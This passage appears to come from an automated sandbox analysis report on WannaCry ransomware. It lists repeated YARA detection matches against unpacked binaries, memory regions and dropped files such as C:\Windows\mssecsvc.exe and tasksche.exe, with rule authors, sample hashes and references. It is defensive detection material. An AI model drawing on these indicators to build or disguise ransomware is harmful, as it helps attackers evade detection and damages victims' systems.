              Source: 4.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 4.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 11.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 6.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 0000001D.00000000.347152674.000000000040E000.00000008.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.265483719.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: 00000004.00000000.267432086.0000000000710000.00000080.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Windows\tasksche.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Windows\mssecsvc.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\WINDOWS\mssecsvc.exeJump to behavior
